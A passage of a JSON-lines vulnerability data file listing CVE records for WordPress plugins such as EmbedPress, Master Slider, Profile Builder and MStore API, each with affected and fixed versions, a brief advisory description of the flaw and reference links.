version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/caa97ae8-40a8-4ca1-820b-83675c053bfc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/caa97ae8-40a8-4ca1-820b-83675c053bfc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.9.8\\\/EmbedPress\\\/Elementor\\\/Widgets\\\/Embedpress_Pdf.php#L705\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.9.8\\\/EmbedPress\\\/Elementor\\\/Widgets\\\/Embedpress_Pdf.php#L705\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3037767%40embedpress&new=3037767%40embedpress&sfp_email=&sfph_mail=#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3037767%40embedpress&new=3037767%40embedpress&sfp_email=&sfph_mail=#file1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2128","slug":"embedpress","versionImpact":"3.9.10","versionEndExcluding":"3.9.11","description":"The EmbedPress \u2013 Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps & Embed Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's embed widget in all versions up to, and including, 3.9.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.9.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6189368d-5925-4c84-9f0f-694b9ebcd45e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6189368d-5925-4c84-9f0f-694b9ebcd45e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.9.10\\\/EmbedPress\\\/Elementor\\\/Widgets\\\/Embedpress_Pdf.php#L688\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.9.10\\\/EmbedPress\\\/Elementor\\\/Widgets\\\/Embedpress_Pdf.php#L688\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3045489%40embedpress&new=3045489%40embedpress&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3045489%40embedpress&new=3045489%40embedpress&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1802","slug":"embedpress","versionImpact":"3.9.10","versionEndExcluding":"3.9.11","description":"The EmbedPress \u2013 Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps & Embed Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Wistia embed block in all versions up to, and including, 3.9.10 due to insufficient input sanitization and output escaping on the user supplied url. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.9.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48511d1a-2fd5-4be4-8409-e99d4aadcdfe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48511d1a-2fd5-4be4-8409-e99d4aadcdfe?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3045489%40embedpress&new=3045489%40embedpress&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3045489%40embedpress&new=3045489%40embedpress&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6382","slug":"master-slider","versionImpact":"3.9.9","versionEndExcluding":"3.9.10","description":"The Master Slider \u2013 Responsive Touch Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ms_slide' shortcode in all versions up to, and including, 3.9.9 due to insufficient input sanitization and output escaping on user supplied 'css_class' attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.9.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d2fc926-6f9f-4ed9-9598-e39b5e6c6544?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d2fc926-6f9f-4ed9-9598-e39b5e6c6544?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/trunk\\\/includes\\\/msp-shortcodes.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/trunk\\\/includes\\\/msp-shortcodes.php#L55\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3065917%40master-slider&new=3065917%40master-slider&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3065917%40master-slider&new=3065917%40master-slider&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3084860%40master-slider&new=3084860%40master-slider&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3084860%40master-slider&new=3084860%40master-slider&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4470","slug":"master-slider","versionImpact":"3.9.9","versionEndExcluding":"3.9.10","description":"The Master Slider \u2013 Responsive Touch Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ms_slide_info' shortcode in all versions up to, and including, 3.9.9 due to insufficient input sanitization and output escaping on user supplied 'tag_name' attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.9.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd59bee7-5de5-406d-8c1b-654306d68ab8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd59bee7-5de5-406d-8c1b-654306d68ab8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/tags\\\/3.9.9\\\/includes\\\/msp-shortcodes.php#L1078\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/tags\\\/3.9.9\\\/includes\\\/msp-shortcodes.php#L1078\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084860\\\/#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084860\\\/#file2\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2297","slug":"profile-builder","versionEndExcluding":"3.9.1","description":"The Profile Builder \u2013 User Profile & User Registration Forms plugin for WordPress is vulnerable to unauthorized password resets in versions up to, and including 3.9.0. This is due to the plugin using native password reset functionality, with insufficient validation on the password reset function (wppb_front_end_password_recovery). The function uses the plaintext value of a password reset key instead of a hashed value which means it can easily be retrieved and subsequently used. An attacker can leverage CVE-2023-0814, or another vulnerability like SQL Injection in another plugin or theme installed on the site to successfully exploit this vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e731292a-4f95-46eb-889e-b00d58f3444e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e731292a-4f95-46eb-889e-b00d58f3444e?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2864329%40profile-builder&new=2864329%40profile-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2864329%40profile-builder&new=2864329%40profile-builder&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/lana.codes\\\/lanavdb\\\/512e7307-04a5-4d8b-8f79-f75f37784a9f\\\/\",\"name\":\"https:\\\/\\\/lana.codes\\\/lanavdb\\\/512e7307-04a5-4d8b-8f79-f75f37784a9f\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2023\\\/03\\\/vulnerability-patched-in-cozmolabs-profile-builder-plugin-information-disclosure-leads-to-account-takeover\\\/\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2023\\\/03\\\/vulnerability-patched-in-cozmolabs-profile-builder-plugin-information-disclosure-leads-to-account-takeover\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2733","slug":"mstore-api","versionEndExcluding":"3.9.1","description":"The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.0. This is due to insufficient verification on the user being supplied during the coupon redemption REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2913397%40mstore-api&old=2910707%40mstore-api&sfp_email=&sfph_mail=#file60\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2913397%40mstore-api&old=2910707%40mstore-api&sfp_email=&sfph_mail=#file60\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/3.9.0\\\/controllers\\\/flutter-woo.php#L734\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/3.9.0\\\/controllers\\\/flutter-woo.php#L734\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c726d8f0-7f2a-414b-9d73-a053921074d9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c726d8f0-7f2a-414b-9d73-a053921074d9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0814","slug":"profile-builde","versionEndExcluding":"3.9.1","description":"The Profile Builder \u2013 User Profile & User Registration Forms plugin for WordPress is vulnerable to sensitive information disclosure via the [user_meta] shortcode in versions up to, and including 3.9.0. This is due to insufficient restriction on sensitive user meta values that can be called via that shortcode. This makes it possible for authenticated attackers, with subscriber-level permissions, and above to retrieve sensitive user meta that can be used to gain access to a high privileged user account. This does require the Usermeta shortcode be enabled to be exploited.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2864329%40profile-builder&new=2864329%40profile-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2864329%40profile-builder&new=2864329%40profile-builder&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbedad66-a5a6-4fb5-b03e-0ecf9fbef19a\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbedad66-a5a6-4fb5-b03e-0ecf9fbef19a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11769","slug":"flower-delivery-by-florist-one","versionImpact":"3.9","versionEndExcluding":"3.9.1","description":"The Flower Delivery by Florist One plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'flower-delivery' shortcode in all versions up to, and including, 3.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201180%40flower-delivery-by-florist-one&new=3201180%40flower-delivery-by-florist-one&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201180%40flower-delivery-by-florist-one&new=3201180%40flower-delivery-by-florist-one&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93efae1f-1e4a-48ee-8a69-558c38925250?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93efae1f-1e4a-48ee-8a69-558c38925250?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13846","slug":"ulp-duplicate-post-sql-timebased","versionImpact":"3.9","versionEndExcluding":"3.9.1","description":"The Indeed Ultimate Learning Pro plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018post_id\u2019 parameter in all versions up to, and including, 3.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ultimate-learning-pro-wordpress-plugin\\\/21772657\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ultimate-learning-pro-wordpress-plugin\\\/21772657\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9ccd2cc-ee5e-40e3-905d-21884ec01f72?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9ccd2cc-ee5e-40e3-905d-21884ec01f72?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12259","slug":"computer-repair-shop","versionImpact":"3.8120","versionEndExcluding":"3.8122","description":"The CRM WordPress Plugin \u2013 RepairBuddy plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.8120. This is due to the plugin not properly validating a user's identity prior to updating their email through the wc_update_user_data AJAX action. This makes it possible for authenticated attackers, with subscriber-level access and above, to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.","recommendation":"Update to version 3.8122, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204501%40computer-repair-shop&new=3204501%40computer-repair-shop&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204501%40computer-repair-shop&new=3204501%40computer-repair-shop&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3206568%40computer-repair-shop&new=3206568%40computer-repair-shop&sfp_email=&sfph_mail=#file548\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3206568%40computer-repair-shop&new=3206568%40computer-repair-shop&sfp_email=&sfph_mail=#file548\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3208270%40computer-repair-shop&new=3208270%40computer-repair-shop&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3208270%40computer-repair-shop&new=3208270%40computer-repair-shop&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80997d2f-3e16-48f6-969b-58844cb83d53?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80997d2f-3e16-48f6-969b-58844cb83d53?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4266","slug":"metform","versionImpact":"3.8.8","versionEndExcluding":"3.8.9","description":"The MetForm \u2013 Contact Form, Survey, Quiz, & Custom Form Builder for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 3.8.8 via the 'handle_file' function. This can allow unauthenticated attackers to extract sensitive data, such as Personally Identifiable Information, from files uploaded by users.","recommendation":"Update to version 3.8.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8edb72f5-dda3-4c59-ba7a-7a460cb59c03?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8edb72f5-dda3-4c59-ba7a-7a460cb59c03?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/core\\\/entries\\\/action.php#L1019\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/core\\\/entries\\\/action.php#L1019\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099977\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099977\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12112","slug":"easy-form-builder","versionImpact":"3.8.8","versionEndExcluding":"3.8.9","description":"The Easy Form Builder \u2013 WordPress plugin form builder: contact form, survey form, payment form, and custom form builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'name' parameter of the 'add_form_Emsfb' AJAX action in all versions up to, and including, 3.8.8 due to insufficient input sanitization and output escaping and missing authorization checks. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.8.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3215764\\\/easy-form-builder\\\/trunk\\\/includes\\\/admin\\\/class-Emsfb-create.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3215764\\\/easy-form-builder\\\/trunk\\\/includes\\\/admin\\\/class-Emsfb-create.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a71e72dd-574c-41fc-a000-7a4cf658f3d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a71e72dd-574c-41fc-a000-7a4cf658f3d7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2276","slug":"ultimate-dashboard","versionImpact":"3.8.7","versionEndExcluding":"3.8.8","description":"The Ultimate Dashboard \u2013 Custom WordPress Dashboard plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the handle_module_actions function in all versions up to, and including, 3.8.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to activate\/deactivate plugin modules.","recommendation":"Update to version 3.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-dashboard\\\/tags\\\/3.8.7\\\/modules\\\/feature\\\/class-feature-module.php#L118\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-dashboard\\\/tags\\\/3.8.7\\\/modules\\\/feature\\\/class-feature-module.php#L118\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffee6564-2718-4461-b481-cbf0e204a04d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffee6564-2718-4461-b481-cbf0e204a04d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5529","slug":"wp-quicklatex","versionImpact":"3.8.7","versionEndExcluding":"3.8.8","description":"The WP QuickLaTeX WordPress plugin before 3.8.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/66d0b4b7-cd4b-4ec4-95c0-d50773cb0b8f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/66d0b4b7-cd4b-4ec4-95c0-d50773cb0b8f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5874","slug":"ays-popup-box","versionEndExcluding":"3.8.7","description":"The Popup box WordPress plugin before 3.8.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.8.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ebe3e873-1259-43b9-a027-daa4dbd937f3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ebe3e873-1259-43b9-a027-daa4dbd937f3\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5809","slug":"ays-popup-box","versionEndExcluding":"3.8.7","description":"The Popup box WordPress plugin before 3.8.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.8.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f1eb05e8-1b7c-45b1-912d-f668bd68e265\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f1eb05e8-1b7c-45b1-912d-f668bd68e265\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5472","slug":"wp-quicklatex","versionImpact":"3.8.6","versionEndExcluding":"3.8.7","description":"The WP QuickLaTeX WordPress plugin before 3.8.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.8.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dcddc2de-c32c-4f8c-8490-f3d980b05822\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dcddc2de-c32c-4f8c-8490-f3d980b05822\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10899","slug":"wc-product-table-lite","versionImpact":"3.8.6","versionEndExcluding":"3.8.7","description":"The WooCommerce Product Table Lite plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.8.6. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. The same 'id' parameter is vulnerable to Reflected Cross-Site Scripting as well.","recommendation":"Update to version 3.8.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9b010ff-8a4a-4553-bb2b-d58a254d7ee4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9b010ff-8a4a-4553-bb2b-d58a254d7ee4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-product-table-lite\\\/tags\\\/3.8.6\\\/main.php#L1778\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-product-table-lite\\\/tags\\\/3.8.6\\\/main.php#L1778\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3190789%40wc-product-table-lite&new=3190789%40wc-product-table-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3190789%40wc-product-table-lite&new=3190789%40wc-product-table-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6458","slug":"wc-product-table-lite","versionImpact":"3.5.1","versionEndExcluding":"3.8.6","description":"The WooCommerce Product Table Lite plugin for WordPress is vulnerable to unauthorized post title modification due to a missing capability check on the wcpt_presets__duplicate_preset_to_table function in all versions up to, and including, 3.5.1. This makes it possible for authenticated attackers with subscriber access and above to change titles of arbitrary posts. Missing sanitization can lead to Stored Cross-Site Scripting when viewed by an admin via the WooCommerce Product Table.","recommendation":"Update to version 3.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e06fb465-4c72-49a8-af35-ff6d629ff9a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e06fb465-4c72-49a8-af35-ff6d629ff9a0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-product-table-lite\\\/trunk\\\/presets\\\/presets.php#L120\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-product-table-lite\\\/trunk\\\/presets\\\/presets.php#L120\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3125858%40wc-product-table-lite&new=3125858%40wc-product-table-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3125858%40wc-product-table-lite&new=3125858%40wc-product-table-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1525","slug":"ultimate-dashboard","versionImpact":"3.8.5","versionEndExcluding":"3.8.6","description":"The Ultimate Dashboard WordPress plugin before 3.8.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d457733f-72e9-45e2-ac07-4e1b94e46102\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d457733f-72e9-45e2-ac07-4e1b94e46102\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
